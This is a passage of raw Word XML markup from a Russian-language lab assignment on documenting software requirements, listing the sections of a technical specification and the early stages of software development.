        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Задание 1.</w:t>
      </w:r>
      <w:r w:rsidR="00F63AE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучить элементы документирования разработки. Научиться </w:t>
      </w:r>
      <w:r w:rsidR="00F63AE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>документировать требования к программному обеспечению</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824CBE" w:rsidRPr="00617AC0" w:rsidRDefault="0009139F" w:rsidP="00824CBE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные </w:t>
      </w:r>
      <w:r w:rsidR="00F63AE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Требования к ТЗ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Техническое задание должно содержать следующие разделы: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">введение; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">основания для разработки; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">назначение разработки; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">требования к программе или программному изделию; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">требования к программной документации; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">технико-экономические показатели; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">стадии и этапы разработки; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">порядок контроля и приемки; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1077"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">в техническое задание допускается включать приложения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В зависимости от особенностей программы или программного изделия допускается уточнять содержание разделов, вводить новые разделы или объединять отдельные из них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Стадии разработки ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выделяют следующие стадии разработки программного обеспечения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стадия технического задания (предпроектная стадия) </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>состоит из:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>сбора исходных данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определения цели разработки – желаемого набора основных свойств и функций разрабатываемого ПС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>обоснования и выбора критерия эффективности и качества разработки;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>формирования на верхнем уровне состава входной и выходной документации по решаемой задаче;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>выбора принципиальных методов решения задач;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определения требований к комплексу технических средств и операционному окружению;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определения инструментальных средств, используемых для разработки;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>планирования, т.е. декомпозиции процесса на стадии и этапы с установлением сроков их выполнения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разработки документа, называемого «Техническое задание».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эскизное проектирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На данной стадии выполняется: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>детализация состава и структуры входной и выходной информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>детализация метода решения задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На этапе эскизного проектирования нужно создать предварительную версию программного средства (возможно в виде модели) и выяснить принципиальные вопросы, устраняя возможные разногласия между разработчиком и заказчиком. При этом выполняется:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определение предварительной технологии решения задачи;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>прогнозирование эффективности решения задачи на конкретном объекте;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ведется освоение инструментальных средств (апробирование, обучение персонала).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Техническое проектирование (технический проект)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На данном этапе:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
